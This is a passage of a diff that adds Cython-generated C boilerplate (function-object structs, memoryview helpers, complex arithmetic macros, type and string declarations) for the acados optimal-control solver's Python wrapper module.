FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject *func_doc; + PyObject *func_globals; + PyObject *func_code; + PyObject *func_closure; +#if PY_VERSION_HEX < 0x030900B1 + PyObject *func_classobj; +#endif + void *defaults; + int defaults_pyobjects; + size_t defaults_size; // used by FusedFunction for copying defaults + int flags; + PyObject *defaults_tuple; + PyObject *defaults_kwdict; + PyObject *(*defaults_getter)(PyObject *); + PyObject *func_annotations; + PyObject *func_is_coroutine; +} __pyx_CyFunctionObject; +#define __Pyx_CyFunction_Check(obj) __Pyx_TypeCheck(obj, __pyx_CyFunctionType) +#define __Pyx_IsCyOrPyCFunction(obj) __Pyx_TypeCheck2(obj, __pyx_CyFunctionType, &PyCFunction_Type) +#define __Pyx_CyFunction_CheckExact(obj) __Pyx_IS_TYPE(obj, __pyx_CyFunctionType) +static PyObject *__Pyx_CyFunction_Init(__pyx_CyFunctionObject* op, PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); +static CYTHON_INLINE void __Pyx__CyFunction_SetClassObj(__pyx_CyFunctionObject* f, PyObject* classobj); +static CYTHON_INLINE void *__Pyx_CyFunction_InitDefaults(PyObject *m, + size_t size, + int pyobjects); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsTuple(PyObject *m, + PyObject *tuple); +static CYTHON_INLINE void __Pyx_CyFunction_SetDefaultsKwDict(PyObject *m, + PyObject *dict); +static CYTHON_INLINE void __Pyx_CyFunction_SetAnnotationsDict(PyObject *m, + PyObject *dict); +static int __pyx_CyFunction_init(PyObject *module); +#if CYTHON_METH_FASTCALL +static PyObject * __Pyx_CyFunction_Vectorcall_NOARGS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_O(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +static PyObject * __Pyx_CyFunction_Vectorcall_FASTCALL_KEYWORDS_METHOD(PyObject *func, PyObject *const *args, size_t nargsf, PyObject *kwnames); +#if CYTHON_BACKPORT_VECTORCALL +#define __Pyx_CyFunction_func_vectorcall(f) (((__pyx_CyFunctionObject*)f)->func_vectorcall) +#else +#define __Pyx_CyFunction_func_vectorcall(f) (((PyCFunctionObject*)f)->vectorcall) +#endif +#endif + +/* CythonFunction.proto */ +static PyObject *__Pyx_CyFunction_New(PyMethodDef *ml, + int flags, PyObject* qualname, + PyObject *closure, + PyObject *module, PyObject *globals, + PyObject* code); + +/* IterFinish.proto */ +static CYTHON_INLINE int __Pyx_IterFinish(void); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* UnpackItemEndCheck.proto */ +static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected); + +/* UnpackTupleError.proto */ +static void __Pyx_UnpackTupleError(PyObject *, Py_ssize_t index); + +/* UnpackTuple2.proto */ +#define __Pyx_unpack_tuple2(tuple, value1, value2, is_tuple, has_known_size, decref_tuple)\ + (likely(is_tuple || PyTuple_Check(tuple)) ?\ + (likely(has_known_size || PyTuple_GET_SIZE(tuple) == 2) ?\ + __Pyx_unpack_tuple2_exact(tuple, value1, value2, decref_tuple) :\ + (__Pyx_UnpackTupleError(tuple, 2), -1)) :\ + __Pyx_unpack_tuple2_generic(tuple, value1, value2, has_known_size, decref_tuple)) +static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** value1, PyObject** value2, int decref_tuple); +static int __Pyx_unpack_tuple2_generic( + PyObject* tuple, PyObject** value1, PyObject** value2, int has_known_size, int decref_tuple); + +/* dict_iter.proto */ +static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* dict, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_is_dict); +static CYTHON_INLINE int __Pyx_dict_iter_next(PyObject* dict_or_iter, Py_ssize_t orig_length, Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int is_dict); + +/* PyIntBinop.proto */ +#if !CYTHON_COMPILING_IN_PYPY +static PyObject* __Pyx_PyInt_AddObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check); +#else +#define __Pyx_PyInt_AddObjC(op1, op2, intval, inplace, zerodivision_check)\ + (inplace ? PyNumber_InPlaceAdd(op1, op2) : PyNumber_Add(op1, op2)) +#endif + +/* BufferIndexError.proto */ +static void __Pyx_RaiseBufferIndexError(int axis); + +#define __Pyx_BufPtrStrided1d(type, buf, i0, s0) (type)((char*)buf + i0 * s0) +/* PyUnicode_Unicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* SetVTable.proto */ +static int __Pyx_SetVtable(PyTypeObject* typeptr , void* vtable); + +/* GetVTable.proto */ +static void* __Pyx_GetVtable(PyTypeObject *type); + +/* MergeVTables.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type); +#endif + +/* TypeImport.proto */ +#ifndef __PYX_HAVE_RT_ImportType_proto_3_0_0 +#define __PYX_HAVE_RT_ImportType_proto_3_0_0 +#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L +#include +#endif +#if (defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) || __cplusplus >= 201103L +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) alignof(s) +#else +#define __PYX_GET_STRUCT_ALIGNMENT_3_0_0(s) sizeof(void*) +#endif +enum __Pyx_ImportType_CheckSize_3_0_0 { + __Pyx_ImportType_CheckSize_Error_3_0_0 = 0, + __Pyx_ImportType_CheckSize_Warn_3_0_0 = 1, + __Pyx_ImportType_CheckSize_Ignore_3_0_0 = 2 +}; +static PyTypeObject *__Pyx_ImportType_3_0_0(PyObject* module, const char *module_name, const char *class_name, size_t size, size_t alignment, enum __Pyx_ImportType_CheckSize_3_0_0 check_size); +#endif + +/* CLineInTraceback.proto */ +#ifdef CYTHON_CLINE_IN_TRACEBACK +#define __Pyx_CLineForTraceback(tstate, c_line) (((CYTHON_CLINE_IN_TRACEBACK)) ? c_line : 0) +#else +static int __Pyx_CLineForTraceback(PyThreadState *tstate, int c_line); +#endif + +/* CodeObjectCache.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +typedef struct { + PyCodeObject* code_object; + int code_line; +} __Pyx_CodeObjectCacheEntry; +struct __Pyx_CodeObjectCache { + int count; + int max_count; + __Pyx_CodeObjectCacheEntry* entries; +}; +static struct __Pyx_CodeObjectCache __pyx_code_cache = {0,0,NULL}; +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line); +static PyCodeObject *__pyx_find_code_object(int code_line); +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object); +#endif + +/* AddTraceback.proto */ +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename); + +#if PY_MAJOR_VERSION < 3 + static int __Pyx_GetBuffer(PyObject *obj, Py_buffer *view, int flags); + static void __Pyx_ReleaseBuffer(Py_buffer *view); +#else + #define __Pyx_GetBuffer PyObject_GetBuffer + #define __Pyx_ReleaseBuffer PyBuffer_Release +#endif + + +/* BufferStructDeclare.proto */ +typedef struct { + Py_ssize_t shape, strides, suboffsets; +} __Pyx_Buf_DimInfo; +typedef struct { + size_t refcount; + Py_buffer pybuffer; +} __Pyx_Buffer; +typedef struct { + __Pyx_Buffer *rcbuffer; + char *data; + __Pyx_Buf_DimInfo diminfo[8]; +} __Pyx_LocalBuf_ND; + +/* MemviewSliceIsContig.proto */ +static int __pyx_memviewslice_is_contig(const __Pyx_memviewslice mvs, char order, int ndim); + +/* OverlappingSlices.proto */ +static int __pyx_slices_overlap(__Pyx_memviewslice *slice1, + __Pyx_memviewslice *slice2, + int ndim, size_t itemsize); + +/* TypeInfoCompare.proto */ +static int __pyx_typeinfo_cmp(__Pyx_TypeInfo *a, __Pyx_TypeInfo *b); + +/* MemviewSliceValidateAndInit.proto */ +static int __Pyx_ValidateAndInit_memviewslice( + int *axes_specs, + int c_or_f_flag, + int buf_flags, + int ndim, + __Pyx_TypeInfo *dtype, + __Pyx_BufFmt_StackElem stack[], + __Pyx_memviewslice *memviewslice, + PyObject *original_obj); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dcd__double(PyObject *, int writable_flag); + +/* ObjectToMemviewSlice.proto */ +static CYTHON_INLINE __Pyx_memviewslice __Pyx_PyObject_to_MemoryviewSlice_dc_unsigned_char(PyObject *, int writable_flag); + +/* RealImag.proto */ +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #define __Pyx_CREAL(z) ((z).real()) + #define __Pyx_CIMAG(z) ((z).imag()) + #else + #define __Pyx_CREAL(z) (__real__(z)) + #define __Pyx_CIMAG(z) (__imag__(z)) + #endif +#else + #define __Pyx_CREAL(z) ((z).real) + #define __Pyx_CIMAG(z) ((z).imag) +#endif +#if defined(__cplusplus) && CYTHON_CCOMPLEX\ + && (defined(_WIN32) || defined(__clang__) || (defined(__GNUC__) && (__GNUC__ >= 5 || __GNUC__ == 4 && __GNUC_MINOR__ >= 4 )) || __cplusplus >= 201103) + #define __Pyx_SET_CREAL(z,x) ((z).real(x)) + #define __Pyx_SET_CIMAG(z,y) ((z).imag(y)) +#else + #define __Pyx_SET_CREAL(z,x) __Pyx_CREAL(z) = (x) + #define __Pyx_SET_CIMAG(z,y) __Pyx_CIMAG(z) = (y) +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_float(a, b) ((a)==(b)) + #define __Pyx_c_sum_float(a, b) ((a)+(b)) + #define __Pyx_c_diff_float(a, b) ((a)-(b)) + #define __Pyx_c_prod_float(a, b) ((a)*(b)) + #define __Pyx_c_quot_float(a, b) ((a)/(b)) + #define __Pyx_c_neg_float(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_float(z) ((z)==(float)0) + #define __Pyx_c_conj_float(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_float(z) (::std::abs(z)) + #define __Pyx_c_pow_float(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_float(z) ((z)==0) + #define __Pyx_c_conj_float(z) (conjf(z)) + #if 1 + #define __Pyx_c_abs_float(z) (cabsf(z)) + #define __Pyx_c_pow_float(a, b) (cpowf(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_sum_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_diff_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_prod_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_quot_float(__pyx_t_float_complex, __pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_neg_float(__pyx_t_float_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_conj_float(__pyx_t_float_complex); + #if 1 + static CYTHON_INLINE float __Pyx_c_abs_float(__pyx_t_float_complex); + static CYTHON_INLINE __pyx_t_float_complex __Pyx_c_pow_float(__pyx_t_float_complex, __pyx_t_float_complex); + #endif +#endif + +/* Arithmetic.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #define __Pyx_c_eq_double(a, b) ((a)==(b)) + #define __Pyx_c_sum_double(a, b) ((a)+(b)) + #define __Pyx_c_diff_double(a, b) ((a)-(b)) + #define __Pyx_c_prod_double(a, b) ((a)*(b)) + #define __Pyx_c_quot_double(a, b) ((a)/(b)) + #define __Pyx_c_neg_double(a) (-(a)) + #ifdef __cplusplus + #define __Pyx_c_is_zero_double(z) ((z)==(double)0) + #define __Pyx_c_conj_double(z) (::std::conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (::std::abs(z)) + #define __Pyx_c_pow_double(a, b) (::std::pow(a, b)) + #endif + #else + #define __Pyx_c_is_zero_double(z) ((z)==0) + #define __Pyx_c_conj_double(z) (conj(z)) + #if 1 + #define __Pyx_c_abs_double(z) (cabs(z)) + #define __Pyx_c_pow_double(a, b) (cpow(a, b)) + #endif + #endif +#else + static CYTHON_INLINE int __Pyx_c_eq_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_sum_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_diff_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_prod_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_quot_double(__pyx_t_double_complex, __pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_neg_double(__pyx_t_double_complex); + static CYTHON_INLINE int __Pyx_c_is_zero_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_conj_double(__pyx_t_double_complex); + #if 1 + static CYTHON_INLINE double __Pyx_c_abs_double(__pyx_t_double_complex); + static CYTHON_INLINE __pyx_t_double_complex __Pyx_c_pow_double(__pyx_t_double_complex, __pyx_t_double_complex); + #endif +#endif + +/* MemviewSliceCopyTemplate.proto */ +static __Pyx_memviewslice +__pyx_memoryview_copy_new_contig(const __Pyx_memviewslice *from_mvs, + const char *mode, int ndim, + size_t sizeof_dtype, int contig_flag, + int dtype_is_object); + +/* MemviewSliceInit.proto */ +#define __Pyx_BUF_MAX_NDIMS %(BUF_MAX_NDIMS)d +#define __Pyx_MEMVIEW_DIRECT 1 +#define __Pyx_MEMVIEW_PTR 2 +#define __Pyx_MEMVIEW_FULL 4 +#define __Pyx_MEMVIEW_CONTIG 8 +#define __Pyx_MEMVIEW_STRIDED 16 +#define __Pyx_MEMVIEW_FOLLOW 32 +#define __Pyx_IS_C_CONTIG 1 +#define __Pyx_IS_F_CONTIG 2 +static int __Pyx_init_memviewslice( + struct __pyx_memoryview_obj *memview, + int ndim, + __Pyx_memviewslice *memviewslice, + int memview_is_new_reference); +static CYTHON_INLINE int __pyx_add_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +static CYTHON_INLINE int __pyx_sub_acquisition_count_locked( + __pyx_atomic_int_type *acquisition_count, PyThread_type_lock lock); +#define __pyx_get_slice_count_pointer(memview) (&memview->acquisition_count) +#define __PYX_INC_MEMVIEW(slice, have_gil) __Pyx_INC_MEMVIEW(slice, have_gil, __LINE__) +#define __PYX_XCLEAR_MEMVIEW(slice, have_gil) __Pyx_XCLEAR_MEMVIEW(slice, have_gil, __LINE__) +static CYTHON_INLINE void __Pyx_INC_MEMVIEW(__Pyx_memviewslice *, int, int); +static CYTHON_INLINE void __Pyx_XCLEAR_MEMVIEW(__Pyx_memviewslice *, int, int); + +/* CIntFromPy.proto */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_int(int value); + +/* CIntToPy.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value); + +/* CIntFromPy.proto */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *); + +/* CIntFromPy.proto */ +static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *); + +/* FormatTypeName.proto */ +#if CYTHON_COMPILING_IN_LIMITED_API +typedef PyObject *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%U" +static __Pyx_TypeName __Pyx_PyType_GetName(PyTypeObject* tp); +#define __Pyx_DECREF_TypeName(obj) Py_XDECREF(obj) +#else +typedef const char *__Pyx_TypeName; +#define __Pyx_FMT_TYPENAME "%.200s" +#define __Pyx_PyType_GetName(tp) ((tp)->tp_name) +#define __Pyx_DECREF_TypeName(obj) +#endif + +/* CheckBinaryVersion.proto */ +static int __Pyx_check_binary_version(void); + +/* InitStrings.proto */ +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); + +/* #### Code section: module_declarations ### */ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self); /* proto*/ +static char *__pyx_memoryview_get_item_pointer(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto*/ +static PyObject *__pyx_memoryview_is_slice(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assignment(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_dst, PyObject *__pyx_v_src); /* proto*/ +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryview__get_base(struct __pyx_memoryview_obj *__pyx_v_self); /* proto*/ +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp); /* proto*/ +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value); /* proto*/ +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self); /* proto*/ +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self); /* proto*/ + +/* Module declarations from "cython.view" */ + +/* Module declarations from "cython.dataclasses" */ + +/* Module declarations from "cython" */ + +/* Module declarations from "libc.string" */ + +/* Module declarations from "libc.stdio" */ + +/* Module declarations from "libc" */ + +/* Module declarations from "acados_solver_common" */ + +/* Module declarations from "acados_solver" */ + +/* Module declarations from "__builtin__" */ + +/* Module declarations from "cpython.type" */ + +/* Module declarations from "cpython" */ + +/* Module declarations from "cpython.object" */ + +/* Module declarations from "cpython.ref" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "numpy" */ + +/* Module declarations from "acados_template.acados_ocp_solver_pyx" */ +static PyObject *__pyx_collections_abc_Sequence = 0; +static PyObject *generic = 0; +static PyObject *strided = 0; +static PyObject *indirect = 0; +static PyObject *contiguous = 0; +static PyObject *indirect_contiguous = 0; +static int __pyx_memoryview_thread_locks_used; +static PyThread_type_lock __pyx_memoryview_thread_locks[8]; +static CYTHON_INLINE PyObject *__Pyx_carray_to_py_int(int *, Py_ssize_t); /*proto*/ +static CYTHON_INLINE PyObject *__Pyx_carray_to_tuple_int(int *, Py_ssize_t); /*proto*/ +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *); /*proto*/ +static struct __pyx_array_obj *__pyx_array_new(PyObject *, Py_ssize_t, char *, char *, char *); /*proto*/ +static PyObject *__pyx_memoryview_new(PyObject *, int, int, __Pyx_TypeInfo *); /*proto*/ +static CYTHON_INLINE int __pyx_memoryview_check(PyObject *); /*proto*/ +static PyObject *_unellipsify(PyObject *, int); /*proto*/ +static int assert_direct_dimensions(Py_ssize_t *, int); /*proto*/ +static struct __pyx_memoryview_obj *__pyx_memview_slice(struct __pyx_memoryview_obj *, PyObject *); /*proto*/ +static int __pyx_memoryview_slice_memviewslice(__Pyx_memviewslice *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int *, Py_ssize_t, Py_ssize_t, Py_ssize_t, int, int, int, int); /*proto*/ +static char *__pyx_pybuffer_index(Py_buffer *, char *, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memslice_transpose(__Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice, int, PyObject *(*)(char *), int (*)(char *, PyObject *), int); /*proto*/ +static __Pyx_memviewslice *__pyx_memoryview_get_slice_from_memoryview(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static void __pyx_memoryview_slice_copy(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object(struct __pyx_memoryview_obj *); /*proto*/ +static PyObject *__pyx_memoryview_copy_object_from_slice(struct __pyx_memoryview_obj *, __Pyx_memviewslice *); /*proto*/ +static Py_ssize_t abs_py_ssize_t(Py_ssize_t); /*proto*/ +static char __pyx_get_best_slice_order(__Pyx_memviewslice *, int); /*proto*/ +static void _copy_strided_to_strided(char *, Py_ssize_t *, char *, Py_ssize_t *, Py_ssize_t *, Py_ssize_t *, int, size_t); /*proto*/ +static void copy_strided_to_strided(__Pyx_memviewslice *, __Pyx_memviewslice *, int, size_t); /*proto*/ +static Py_ssize_t __pyx_memoryview_slice_get_size(__Pyx_memviewslice *, int); /*proto*/ +static Py_ssize_t __pyx_fill_contig_strides_array(Py_ssize_t *, Py_ssize_t *, Py_ssize_t, int, char); /*proto*/ +static void *__pyx_memoryview_copy_data_to_temp(__Pyx_memviewslice *, __Pyx_memviewslice *, char, int); /*proto*/ +static int __pyx_memoryview_err_extents(int, Py_ssize_t, Py_ssize_t); /*proto*/ +static int __pyx_memoryview_err_dim(PyObject *, PyObject *, int); /*proto*/ +static int __pyx_memoryview_err(PyObject *, PyObject *); /*proto*/ +static int __pyx_memoryview_err_no_memory(void); /*proto*/ +static int __pyx_memoryview_copy_contents(__Pyx_memviewslice, __Pyx_memviewslice, int, int, int); /*proto*/ +static void __pyx_memoryview_broadcast_leading(__Pyx_memviewslice *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_copying(__Pyx_memviewslice *, int, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice_with_gil(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_refcount_objects_in_slice(char *, Py_ssize_t *, Py_ssize_t *, int, int); /*proto*/ +static void __pyx_memoryview_slice_assign_scalar(__Pyx_memviewslice *, int, size_t, void *, int); /*proto*/ +static void __pyx_memoryview__slice_assign_scalar(char *, Py_ssize_t *, Py_ssize_t *, int, size_t, void *); /*proto*/ +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *, PyObject *); /*proto*/ +/* #### Code section: typeinfo ### */ +static __Pyx_TypeInfo __Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t = { "float64_t", NULL, sizeof(__pyx_t_5numpy_float64_t), { 0 }, 0, 'R', 0, 0 }; +static __Pyx_TypeInfo __Pyx_TypeInfo_double = { "double", NULL, sizeof(double), { 0 }, 0, 'R', 0, 0 }; +static __Pyx_TypeInfo __Pyx_TypeInfo_unsigned_char = { "unsigned char", NULL, sizeof(unsigned char), { 0 }, 0, __PYX_IS_UNSIGNED(unsigned char) ? 'U' : 'I', __PYX_IS_UNSIGNED(unsigned char), 0 }; +/* #### Code section: before_global_var ### */ +#define __Pyx_MODULE_NAME "acados_template.acados_ocp_solver_pyx" +extern int __pyx_module_is_main_acados_template__acados_ocp_solver_pyx; +int __pyx_module_is_main_acados_template__acados_ocp_solver_pyx = 0; + +/* Implementation of "acados_template.acados_ocp_solver_pyx" */ +/* #### Code section: global_var ### */ +static PyObject *__pyx_builtin_AssertionError; +static PyObject *__pyx_builtin_NotImplementedError; +static PyObject *__pyx_builtin_range; +static PyObject *__pyx_builtin_open; +static PyObject *__pyx_builtin_print; +static PyObject *__pyx_builtin_TypeError; +static PyObject *__pyx_builtin___import__; +static PyObject *__pyx_builtin_ValueError; +static PyObject *__pyx_builtin_MemoryError; +static PyObject *__pyx_builtin_enumerate; +static PyObject *__pyx_builtin_Ellipsis; +static PyObject *__pyx_builtin_id; +static PyObject *__pyx_builtin_IndexError; +static PyObject *__pyx_builtin_ImportError; +/* #### Code section: string_decls ### */ +static const char __pyx_k_[] = ": "; +static const char __pyx_k_F[] = "F"; +static const char __pyx_k_N[] = "N"; +static const char __pyx_k_O[] = "O"; +static const char __pyx_k_c[] = "c"; +static const char __pyx_k_f[] = "f"; +static const char __pyx_k_i[] = "i"; +static const char __pyx_k_m[] = "m"; +static const char __pyx_k_n[] = "n"; +static const char __pyx_k_p[] = "p"; +static const char 